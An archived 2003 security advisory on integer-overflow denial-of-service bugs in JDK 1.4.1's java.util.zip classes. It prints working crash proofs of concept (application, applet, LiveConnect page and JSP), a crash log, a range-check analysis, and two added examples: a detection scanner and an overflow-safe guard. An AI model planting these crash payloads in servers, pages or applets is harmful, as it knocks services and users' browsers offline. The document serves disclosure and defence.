16th Mar 2003 [SBWID-6070]
COMMAND
JDK Denial-Of-Service holes
SYSTEMS AFFECTED
JDK 1.4.1_01
PROBLEM
From Marc Schoenefeld's Security Alert:
http://www.illegalaccess.org
Several Java distributions (like the popular JDK 1.4.1 JRE from Sun)
have been found to contain several locally exploitable Denial of Service
vulnerabilities in the java.util.zip.* system classes, exploitable by
malicious applets and applications.
Several Java distributions (like the popular JDK 1.4.1 JRE from Sun)
have been found to contain a locally exploitable Denial of Service. The
problem appears difficult to exploit, but hackers have a history of
discovering and releasing exploit code for exploitable flaws. The
techniques described here have been presented at the Blackhat Windows
Security 2003 conference. The following threats appear across the whole
range where Java technology is present:
A malicious user or an attacker could insert the described exploitable
API code to force JVM crashes in the ISP's runtime environment. This
causes an outage of the JSP / servlet service the JVM is running.
This has been tested with Tomcat 4.1.18 with security options turned
on. The threat is not limited to server-based services: a malicious
applet containing code that exploits the vulnerable classes could crash
browser software like Internet Explorer, Netscape Navigator or Lotus
Notes that has Java functionality enabled.
Analysis:
JDK 1.4.1 has entry points to native libraries. These entry points
can be called with parameters (Java simple types or objects). If an
object value is set to null and the native routine does not check for
null values, the JVM reaches an undefined state and typically ends up
in a JVM crash. The following proof-of-concept code describes the
problem stated above. If you are interested in details about JVM
security, see the presentations of Marc Schoenefeld at Blackhat USA 2002
and of LSD-PL at Blackhat Asia 2002. In this specific case there seems
to be a protection against buffer underflow in the vulnerable classes,
which can be disabled by a special combination of the accompanying
parameters that causes an underflow condition. Whether the injected
buffer can be used for shell code injection is still under
investigation.
These vulnerabilities can be exploited in the following scenarios, if
the vulnerable method is called
- in a Java application: there is low to medium risk, because the
attacker normally needs access to the local file system; the risk rises
if classes are loaded dynamically from the network and the jar files are
infected with the exploit.
- in a Java servlet or Java Server Page: there is medium to high risk,
because the attacker normally needs access to the webroot directory.
After injecting an infected servlet/server page, the attacker calls it
via HTTP and the servlet engine (tested with Tomcat 4.1.18) dies with a
JVM crash. Unfortunately the -security parameter has no effect, because
java.util.zip.CRC32 is a trusted class.
- in a Java applet: there is high risk, resulting in a denial of service
of the browser software. This has been tested with several browsers and
JDKs plugged in on W32 and Linux, including popular platforms like
Internet Explorer 5/6, Mozilla and Konqueror using Java plugins like the
current JRE 1.4.1 or JRE 1.3.1.
D:\entw\java\blackhat\crash>java -classpath . CRCCrash.java
Result
An unexpected exception has been detected in native code outside the
VM.
Unexpected Signal : EXCEPTION_ACCESS_VIOLATION occurred at
PC=0x6D3220A4
Function=Java_java_util_zip_ZipEntry_initFields+0x288
Library=C:\Programme\Java\j2re1.4.1_01\bin\zip.dll
Current Java thread:
at java.util.zip.CRC32.updateBytes(Native Method)
at java.util.zip.CRC32.update(CRC32.java:53)
at CRCCrash.main(CRCCrash.java:3)
Dynamic libraries:
0x00400000 - 0x00406000 C:\WINDOWS\system32\java.exe
0x77F40000 - 0x77FEE000 C:\WINDOWS\System32\ntdll.dll
0x77E40000 - 0x77F38000 C:\WINDOWS\system32\kernel32.dll
0x77DA0000 - 0x77E3C000 C:\WINDOWS\system32\ADVAPI32.dll
0x78000000 - 0x78086000 C:\WINDOWS\system32\RPCRT4.dll
0x77BE0000 - 0x77C33000 C:\WINDOWS\system32\MSVCRT.dll
0x6D330000 - 0x6D45A000 C:\Programme\Java\j2re1.4.1_01\bin\client\jvm.dll
0x77D10000 - 0x77D9C000 C:\WINDOWS\system32\USER32.dll
0x77C40000 - 0x77C80000 C:\WINDOWS\system32\GDI32.dll
0x76AF0000 - 0x76B1D000 C:\WINDOWS\system32\WINMM.dll
0x76330000 - 0x7634C000 C:\WINDOWS\System32\IMM32.DLL
0x6D1D0000 - 0x6D1D7000 C:\Programme\Java\j2re1.4.1_01\bin\hpi.dll
0x6D300000 - 0x6D30D000 C:\Programme\Java\j2re1.4.1_01\bin\verify.dll
0x6D210000 - 0x6D229000 C:\Programme\Java\j2re1.4.1_01\bin\java.dll
0x6D320000 - 0x6D32D000 C:\Programme\Java\j2re1.4.1_01\bin\zip.dll
0x76C50000 - 0x76C72000 C:\WINDOWS\system32\imagehlp.dll
0x6DA00000 - 0x6DA7D000 C:\WINDOWS\system32\DBGHELP.dll
0x77BD0000 - 0x77BD7000 C:\WINDOWS\system32\VERSION.dll
0x76BB0000 - 0x76BBB000 C:\WINDOWS\system32\PSAPI.DLL
Local Time = Mon Feb 03 12:15:38 2003
Elapsed Time = 0
#
# The exception above was detected in native code outside the VM
#
# Java VM: Java HotSpot(TM) Client VM (1.4.1_01-b01 mixed mode)
#
Figure 1: JVM Crash
Sample Exploit Application
This application has been successfully tested harmful with Sun JDK
1.3.1, 1.4.0, 1.4.1, IBM JDK 1.3.1 on several tested platforms
including W32, Linux, Solaris and AIX. As this exploit affects trusted
system libs it is likely that J2EE application servers and JMX runtime
components are also affected.
If non-desktop related java environments like the embedded solutions
frameworks (MIDP) for devices like cellular phones is affected is still
under investigation.
public class CRCCrash {
    public static void main(String[] args) {
        (new java.util.zip.CRC32()).update(new byte[0], 4, Integer.MAX_VALUE - 3);
    }
}
Figure 2: CRCCrash.java
Sample Exploit Applet
This applet has been successfully tested harmful with IE6, IE5,
Mozilla, Konqueror, but it is expected that other Java based browsers
and systems with embedded browsers with Java functionality like Lotus
Notes, Outlook, etc. are also vulnerable because the exploitable
component is the underlying JDK (see above).
/**
 * Describe class <code>CRC32CrashApplet</code> here.
 *
 * @author <a href="mailto:[email protected]">Marc Schoenefeld</a>
 * @version 1.0
 */
public class CRC32CrashApplet extends java.applet.Applet {
    public void paint(java.awt.Graphics g)
    {
        java.util.zip.CRC32 crc = new java.util.zip.CRC32();
        crc.update(new byte[0], 4, Integer.MAX_VALUE - 3);
        g.drawString("Crash the browser!", 20, 90);
    }
}
Figure 3: CRC32CrashApplet.java
Sample Exploit Liveconnect page
<html>
<body>
<script language=javascript>
b=java.lang.String("");c=b.getBytes();a=new java.util.zip.Adler32();a.update(c,4, 0x7ffffffc);
</script>
</body>
</html>
Figure 4: CRC32Crash.html
Sample Exploit Java Server Page
This server page has been tested with Apache Jakarta Tomcat 4.1.18, but
it is expected that other servlet engines like Websphere, JRun are also
vulnerable because the exploitable component is the underlying JDK (see
above).
<%@page contentType="text/html;charset=WINDOWS-1252" import="java.util.zip.*"%>
<% %>
<%! %>
<% (new CRC32()).update(new byte[0],4,Integer.MAX_VALUE-3); %>
<html>
<head>
<title>Crash-JSP mit java.util.zip.CRC32.update</title>
</head>
<body>
<hr>
<h1>Crash-JSP mit sun.misc.MessageUtils.toStderr(null)</h1>
<h2> Marc Schoenefeld , [email protected] </h2>
</body>
</html>
Figure 5: CRC32CrashApplet.jsp
Affected methods and classes
java.util.zip.Adler32().update(...);
java.util.zip.Deflater().setDictionary(...);
java.util.zip.CRC32().update(...);
java.util.zip.Deflater().deflate(...);
java.util.zip.CheckedOutputStream().write(...);
java.util.zip.CheckedInputStream().read(...);
Detection:
==========
Scan the imports of the (self-written) classes of your Java
applications (especially those downloaded from remote sites) to see
whether they call into the affected methods.
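As an added example (it is not part of the advisory), the detection step above carried out on compiled classes rather than on source imports: the scanner parses the constant pool of a .class file and reports every Methodref or InterfaceMethodref that targets one of the affected java.util.zip methods listed in the advisory. The class name ZipCallScanner and its method names are this example's own.

```java
import java.io.DataInputStream;
import java.io.FileInputStream;
import java.io.IOException;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.HashSet;
import java.util.List;
import java.util.Set;

/** Reports call sites of the java.util.zip methods named in the advisory. */
public class ZipCallScanner {

    // Owner/method pairs from the advisory's "Affected methods and classes" list.
    static final Set<String> AFFECTED = new HashSet<>(Arrays.asList(
        "java/util/zip/Adler32.update",
        "java/util/zip/CRC32.update",
        "java/util/zip/Deflater.setDictionary",
        "java/util/zip/Deflater.deflate",
        "java/util/zip/CheckedOutputStream.write",
        "java/util/zip/CheckedInputStream.read"));

    /** Returns "owner.name(descriptor)" for every affected method the class file references. */
    static List<String> scan(DataInputStream in) throws IOException {
        if (in.readInt() != 0xCAFEBABE) throw new IOException("not a class file");
        in.readUnsignedShort();                       // minor_version
        in.readUnsignedShort();                       // major_version
        int count = in.readUnsignedShort();           // constant_pool_count
        int[] tag = new int[count];
        String[] utf8 = new String[count];
        int[] ref1 = new int[count];                  // class_index / name_index, per tag
        int[] ref2 = new int[count];                  // name_and_type_index / descriptor_index
        for (int i = 1; i < count; i++) {
            tag[i] = in.readUnsignedByte();
            switch (tag[i]) {
                case 1:  utf8[i] = in.readUTF(); break;            // CONSTANT_Utf8 (u2 length + modified UTF-8)
                case 3: case 4: in.readInt(); break;               // Integer, Float
                case 5: case 6: in.readLong(); i++; break;         // Long, Double occupy two slots
                case 7: case 8: case 16: case 19: case 20:         // Class, String, MethodType, Module, Package
                    ref1[i] = in.readUnsignedShort(); break;
                case 9: case 10: case 11: case 12: case 17: case 18: // Fieldref, Methodref, InterfaceMethodref,
                    ref1[i] = in.readUnsignedShort();              // NameAndType, Dynamic, InvokeDynamic
                    ref2[i] = in.readUnsignedShort(); break;
                case 15: in.readUnsignedByte(); in.readUnsignedShort(); break; // MethodHandle
                default: throw new IOException("unknown constant pool tag " + tag[i]);
            }
        }
        List<String> hits = new ArrayList<>();
        for (int i = 1; i < count; i++) {
            if (tag[i] != 10 && tag[i] != 11) continue;   // only Methodref / InterfaceMethodref
            String owner = utf8[ref1[ref1[i]]];           // Class -> Utf8
            int nat = ref2[i];                             // NameAndType entry
            String name = utf8[ref1[nat]];
            String desc = utf8[ref2[nat]];
            if (AFFECTED.contains(owner + "." + name)) hits.add(owner + "." + name + desc);
        }
        return hits;
    }

    public static void main(String[] args) throws IOException {
        for (String path : args) {
            try (DataInputStream in = new DataInputStream(new FileInputStream(path))) {
                List<String> hits = scan(in);
                System.out.println(path + ": " + (hits.isEmpty() ? "no affected calls" : hits));
            }
        }
    }
}
```

Run it as `java ZipCallScanner CRCCrash.class` (or over every class extracted from a downloaded jar). It flags call sites for review, not unsafe argument values; calls made through reflection, or from third-party jars you did not scan, will not be reported, which is why the vendor patch rather than the scan is the real fix.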
Analysis:
=========
CRC32 has native calls in the following methods:
private native static int update(int adler, int b);
private native static int updateBytes(int adler, byte[] b, int off,int len);
The source of all vulnerabilities was found to be inadequate range
checks which lead to integer overflows. The CRC32 methods that guard
the native call into zip.dll appear to be coded roughly like the
following:
public class CRC32 [...] {
    [...]
    public void update(byte[] buff, int offset, int lenny) {
        if (buff == null)
        {
            throw new NullPointerException();
        }
        // offset + lenny is computed in 32-bit int arithmetic and can wrap around
        if (offset < 0 || lenny < 0 || offset + lenny > buff.length)
        {
            throw new ArrayIndexOutOfBoundsException();
        }
        adler = updateBytes(adler, buff, offset, lenny);
    }
- the buffer has to be non-null, therefore the exploit uses byte[0]
- if offset < 0 the call is rejected
- if lenny < 0 the call is rejected
- if offset + lenny is larger than buff.length the call is rejected
To exploit the vulnerability a situation must be created where
offset + lenny <= buff.length AND offset >= 0 AND lenny >= 0
which is in our example given for x = 4:
offset = x AND length = Integer.MAX_VALUE - x + buff.length + 1
With these values offset + lenny wraps around to Integer.MIN_VALUE,
which is smaller than buff.length = 0, so the check passes and the
native routine is entered with a length of almost 2^31 on an empty
array.
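The following class is an added example, not code from the advisory or from Sun: it models the reconstructed guard next to the overflow-safe rearrangement that does not form the sum (comparing offset against buff.length - len, which cannot wrap once both operands are non-negative), evaluates both on the advisory's argument set, and probes whether the JRE running the code rejects that argument set. The class and method names are this example's own.

```java
import java.util.zip.CRC32;

/** Vulnerable and fixed forms of the update() range check, side by side. */
public class RangeCheckDemo {

    /** Shape of the guard reconstructed in the advisory: offset + len is formed in int and can wrap. */
    static boolean vulnerableGuardAccepts(int bufLength, int offset, int len) {
        if (offset < 0 || len < 0 || offset + len > bufLength) {
            return false;               // would throw ArrayIndexOutOfBoundsException
        }
        return true;                    // would enter the native updateBytes()
    }

    /** Overflow-safe form: bufLength - len stays in range because both operands are >= 0 here. */
    static boolean fixedGuardAccepts(int bufLength, int offset, int len) {
        if (offset < 0 || len < 0 || offset > bufLength - len) {
            return false;
        }
        return true;
    }

    /** The sum the vulnerable guard compares; for the advisory's values it is Integer.MIN_VALUE. */
    static int wrappedSum(int offset, int len) {
        return offset + len;
    }

    /**
     * Probe with the advisory's own argument set (byte[0], 4, Integer.MAX_VALUE - 3).
     * A fixed JRE rejects it with ArrayIndexOutOfBoundsException; on the affected
     * builds named in the advisory the same call reaches native code and crashes the VM.
     */
    static boolean runningJreRejectsAdvisoryArguments() {
        try {
            new CRC32().update(new byte[0], 4, Integer.MAX_VALUE - 3);
            return false;
        } catch (ArrayIndexOutOfBoundsException expected) {
            return true;
        }
    }

    public static void main(String[] args) {
        int bufLength = 0, offset = 4, len = Integer.MAX_VALUE - 3;   // values from CRCCrash.java
        System.out.println("offset + len wraps to:        " + wrappedSum(offset, len));
        System.out.println("vulnerable guard accepts:     " + vulnerableGuardAccepts(bufLength, offset, len));
        System.out.println("fixed guard accepts:          " + fixedGuardAccepts(bufLength, offset, len));
        // A legitimate call (16-byte buffer, offset 4, length 8) passes both forms.
        System.out.println("legitimate call, fixed guard: " + fixedGuardAccepts(16, 4, 8));
        System.out.println("running JRE rejects the call: " + runningJreRejectsAdvisoryArguments());
    }
}
```

The rearranged comparison is the general defence for every method in the affected list: any bounds check of the form `off + len > length` on 32-bit ints must be written as `off > length - len` (after the non-negativity checks) so that no intermediate result can overflow before it reaches native code.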
SOLUTION
Workaround:
===========
- Disable Java, or if this is not possible:
- Do not download Java applets from untrusted sources
- Ask your JRE/JDK vendor (Sun, IBM, ...) for a security update
Patch Available
===============
The vulnerabilities described here are no longer present in JDK
1.4.1_02. The present JDK 1.3.1_07 is still affected. A patch for IBM
JDK is not known.
History
=======
The bugs have been reported to the official java bug database on Feb
03, 2003 and have been considered to be new, their URLs in the bug
database are
http://developer.java.sun.com/developer/bugParade/bugs/4811913.html
http://developer.java.sun.com/developer/bugParade/bugs/4812181.html
http://developer.java.sun.com/developer/bugParade/bugs/4812006.html
http://developer.java.sun.com/developer/bugParade/bugs/4811927.html
http://developer.java.sun.com/developer/bugParade/bugs/4811917.html
Further Information
===================
An extended version of this report with a summary about native
method vulnerabilities can be downloaded from IDefense.com.
Contributor
===========
Marc Schoenefeld , www.illegalaccess.org